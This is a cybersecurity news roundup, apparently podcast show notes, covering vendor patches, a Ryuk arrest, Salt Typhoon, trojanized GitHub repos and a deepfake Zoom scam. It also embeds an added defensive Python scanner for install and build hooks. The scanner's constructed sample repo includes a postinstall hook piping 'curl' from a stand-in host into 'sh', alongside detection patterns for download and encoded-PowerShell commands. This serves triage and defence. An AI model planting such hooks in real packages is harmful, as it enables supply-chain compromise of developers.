Cybersecurity News: Cisco, Atlassian fixes, Ryuk member arrested, Viasat Typhoon attack

In today’s cybersecurity news…

Cisco, Atlassian fix high-severity vulnerabilities

Cisco’s release is related to firmware updates for Meraki devices. The vulnerability in question affects the AnyConnect VPN server and could allow attackers to make these products restart, leading to a DoS condition. This vulnerability has a CVE number and CVSS score of 8.6. The bug can be exploited remotely. Atlassian “announced patches for five vulnerabilities in third-party dependencies in Bamboo, Bitbucket, Confluence, Crowd, and Jira.” These also have CVE numbers which are listed in the show notes for this episode.

“CVE-2025-22228 (an improper authorization in Spring), CVE-2025-24970 (a DoS flaw in the Netty framework), CVE-2024-38816 (a path traversal related to the WebMvc.fn and WebFlux.fn web frameworks), CVE-2024-57699 (a DoS bug in Netplex Json-smart), and CVE-2025-31650 (DoS in Apache Tomcat).”

(Security Week)

Alleged Ryuk ransomware gang member arrested and extradited

A 33-year-old “foreign national” has been arrested in Kyiv and extradited to the U.S. for his alleged role in extorting more than $100 million from victims across the world as part of the Ryuk cybercrime gang. The announcement was made by Ukraine’s Office of the Prosecutor General, but no name was given. Ukrainian investigators described the man’s activities as “searching for vulnerabilities in the corporate networks of the victim companies,” in other words, an “initial access broker.”

(The Record)

Telecom company Viasat attacked by Salt Typhoon

The satellite communications company Viasat has announced it has become the latest telecom industry victim of China’s Salt Typhoon cyber-espionage group. Viasat provides satellite broadband services to “governments worldwide and aviation, military, energy, maritime, and enterprise customers.” It has 189,000 broadband subscribers in the U.S. As reported by Bloomberg, “the company discovered the Salt Typhoon breach earlier this year and has been working with federal authorities to investigate the attack.”

(BleepingComputer)

Krispy Kreme discusses November breach impact

The donut company has now released information on the cyberattack that it suffered last November. Its filing with Maine’s Attorney General shows that cybercriminals accessed data belonging to more than 160,000 people. Along with standard PII, the haul also included financial account information, including credit or debit card numbers along with their access information, as well as email addresses and passwords, biometric data, USCIS or Alien Registration Numbers, U.S. military ID numbers, medical or health information, and health insurance information. Some experts question the company’s need to collect this much data, as well as the quality of its pre-breach security.

(The Register)

Huge thanks to our sponsor, Adaptive Security

As deepfake scams and GenAI phishing evolve, Adaptive equips security teams with AI-powered phishing simulations featuring realistic personalized deepfakes and engaging security awareness training. Their new AI Content Creator turns threat intel and policy updates into interactive, multilingual training — instantly.

Trusted by Fortune 500s and backed by Andreessen Horowitz and OpenAI, Adaptive helps you stay ahead of AI-driven threats.

Learn more at adaptivesecurity.com.

Threat groups distribute malware via open source repos

Researchers at Trend Micro and ReversingLabs are warning of a campaign that appears to “target red teams, novice cybercriminals, and developer environments through trojanized open source hacking tools.” One of these campaigns from the Water Curse group involved “at least 76 GitHub accounts linked to repositories that had malicious payloads injected into build scripts and project files.” The intent of the payloads is to “steal credentials, browser data, and session tokens,” and to provide the threat actor with persistent remote access to the compromised systems. A separate campaign from a group called Banana Squad involves “more than 67 GitHub repositories promising Python-based hacking tools but delivering trojanized look-alikes of other repositories.”

(Security Week)
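Both campaigns above hide the payload where a developer is least likely to read it: in the hooks that run as a side effect of installing or building the tool, rather than in the tool's own source. The following script is an added example, not code from Trend Micro, ReversingLabs or the reports they published; it vets a checked-out repository for build-time execution hooks (npm lifecycle scripts, setuptools install command overrides, MSBuild `<Exec>` tasks) and flags any that download or launch something, so a reviewer can read them before running `npm install`, `pip install` or `dotnet build`. The repository contents, file names and the `example.invalid` URL are constructed for the example.

```python
"""Flag build-time execution hooks in a repository's project files for review.

Added example (not from the original article or the cited reports). The
SAMPLE_REPO below is constructed: a fake "hacking tool" repo whose payload
lives in install/build hooks rather than in the tool's source.
"""
import json
import re
from typing import Callable, Dict, List, Tuple

Finding = Tuple[str, str]  # (file path, message)

# Download / execution primitives that deserve a human look when they appear
# in something that runs automatically at install or build time.
SUSPICIOUS_COMMAND = re.compile(
    r"(curl|wget|Invoke-WebRequest|powershell[^\n]*-(enc|EncodedCommand)|"
    r"base64\s+-d|child_process|certutil)",
    re.IGNORECASE,
)

# npm scripts that run without the user explicitly invoking them.
NPM_LIFECYCLE_HOOKS = {"preinstall", "install", "postinstall", "prepare", "prepublish"}


def scan_package_json(path: str, text: str) -> List[Finding]:
    """Report npm lifecycle hooks; rate them 'high' if they fetch or spawn."""
    try:
        data = json.loads(text)
    except json.JSONDecodeError:
        return [(path, "review: unparseable package.json")]
    findings = []
    for hook, cmd in data.get("scripts", {}).items():
        if hook in NPM_LIFECYCLE_HOOKS:
            level = "high" if SUSPICIOUS_COMMAND.search(cmd) else "review"
            findings.append((path, f"{level}: npm lifecycle hook '{hook}' runs: {cmd}"))
    return findings


def scan_setup_py(path: str, text: str) -> List[Finding]:
    """Report setuptools command overrides, which execute during pip install."""
    findings = []
    if re.search(r"cmdclass\s*=", text) or re.search(
        r"class\s+\w+\((install|develop|egg_info)\)", text
    ):
        findings.append((path, "review: setup.py overrides an install command class"))
    if SUSPICIOUS_COMMAND.search(text):
        findings.append((path, "high: setup.py contains download/shell execution"))
    return findings


def scan_msbuild(path: str, text: str) -> List[Finding]:
    """Report MSBuild <Exec> tasks (pre/post-build events) and rate their commands."""
    findings = []
    for match in re.finditer(r"<Exec\s+[^>]*Command\s*=\s*\"([^\"]*)\"", text, re.IGNORECASE):
        cmd = match.group(1)
        level = "high" if SUSPICIOUS_COMMAND.search(cmd) else "review"
        findings.append((path, f"{level}: MSBuild <Exec> runs: {cmd}"))
    return findings


SCANNERS_BY_NAME: Dict[str, Callable[[str, str], List[Finding]]] = {
    "package.json": scan_package_json,
    "setup.py": scan_setup_py,
}
MSBUILD_SUFFIXES = (".csproj", ".vbproj", ".targets", ".props")


def scan_repo(files: Dict[str, str]) -> List[Finding]:
    """Scan a mapping of relative path -> file text and return all findings."""
    findings: List[Finding] = []
    for path, text in files.items():
        name = path.rsplit("/", 1)[-1]
        if name in SCANNERS_BY_NAME:
            findings.extend(SCANNERS_BY_NAME[name](path, text))
        elif name.endswith(MSBUILD_SUFFIXES):
            findings.extend(scan_msbuild(path, text))
    return findings


# Constructed sample repository: a look-alike "tool" with hooks in three ecosystems.
SAMPLE_REPO: Dict[str, str] = {
    "README.md": "# port-scanner-pro\nA handy tool.\n",
    "package.json": json.dumps({
        "name": "port-scanner-pro",
        "scripts": {
            "test": "node test.js",
            "postinstall": "node -e \"require('child_process').exec('curl http://example.invalid/s | sh')\"",
        },
    }),
    "setup.py": (
        "from setuptools import setup\n"
        "from setuptools.command.install import install\n"
        "class PostInstall(install):\n"
        "    def run(self):\n"
        "        install.run(self)\n"
        "setup(name='scanner', cmdclass={'install': PostInstall})\n"
    ),
    "src/Tool.csproj": (
        "<Project Sdk=\"Microsoft.NET.Sdk\">\n"
        "  <Target Name=\"PreBuild\" BeforeTargets=\"PreBuildEvent\">\n"
        "    <Exec Command=\"powershell -EncodedCommand PLACEHOLDER_BASE64\" />\n"
        "  </Target>\n"
        "</Project>\n"
    ),
}

if __name__ == "__main__":
    for file_path, message in scan_repo(SAMPLE_REPO):
        print(f"{file_path}: {message}")
```

On the constructed repo the scanner reports three items: the npm `postinstall` hook and the MSBuild `<Exec>` as high (they fetch or launch something), and the `setup.py` command override as review-only, since overriding `install` is legitimate in some packages but is exactly where an injected payload would sit. The point is triage, not verdicts: anything flagged should be read in full before the repository is built or installed, ideally in a throwaway VM.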

Community organizations need more cybersecurity help says report

More needs to be done to protect “target-rich but resource-poor community organizations like hospitals, schools, utilities and municipal governments,” according to a new report from the Cyber Resilience Corps. The authors of the report, Sarah Powazek and Grace Menna, state, “community organizations as a whole are falling through the cracks, and current efforts are not enough to help them protect themselves online.” As Derek Johnson writes in Cyberscoop, “experts have long identified these types of [community] organizations as the soft underbelly of America’s cybersecurity problem: important enough that their disruption could cause real world harms, making them attractive targets for profit-minded hackers or foreign intelligence services, but too small and under-resourced to do anything meaningful about it.”

(Cyberscoop and Berkeley Center for Long-Term Cybersecurity)

Android malware surge uses overlays, virtualization fraud and NFC theft

An Android malware named AntiDot has already compromised nearly 4,000 devices through 273 unique campaigns. AntiDot is Malware-as-a-Service operated by a financially motivated threat actor, LARVA-398, and sold on underground forums. It is advertised as a “three-in-one” solution with capabilities to record the device screen, “intercept SMS messages, and extract sensitive data from third-party applications.” It is thought to be delivered through malicious advertising and tailored phishing campaigns. A link to the report from security firm Prodaft is available in the show notes to this episode.

(The Hacker News and Prodaft Report)

North Korea’s tricky ClickFake deepfake scam

A cautionary tale from the crypto world, but equally applicable to regular businesses and organizations. Security firm Huntress reports on a deepfake/social engineering scam in which an employee of a cryptocurrency foundation was invited to talk with a collection of executives of an external company, via Zoom. The short version of this story: upon accepting the Calendly invite, the employee “joined a group Zoom meeting that included several deepfakes of known members of the senior leadership of their company, along with other external contacts.” The employee found that his microphone was not being heard on the call, at which point the deepfake personas sent him a Zoom extension which had been altered to stealthily download a next-stage payload from a remote server. This is now being referred to as a ClickFake interview since it has a similar “I can fix it” vibe as the better-known ClickFix campaigns. The longer version of this story is available through the show notes to this episode.

(The Hacker News)

Steve Prentice
Author, speaker, expert in the area where people and technology crash into each other, viewed from the organizational psychology perspective. Host of many podcasts, voice actor and narrator for corporate media and audiobooks. Ghost-writer for busy executives.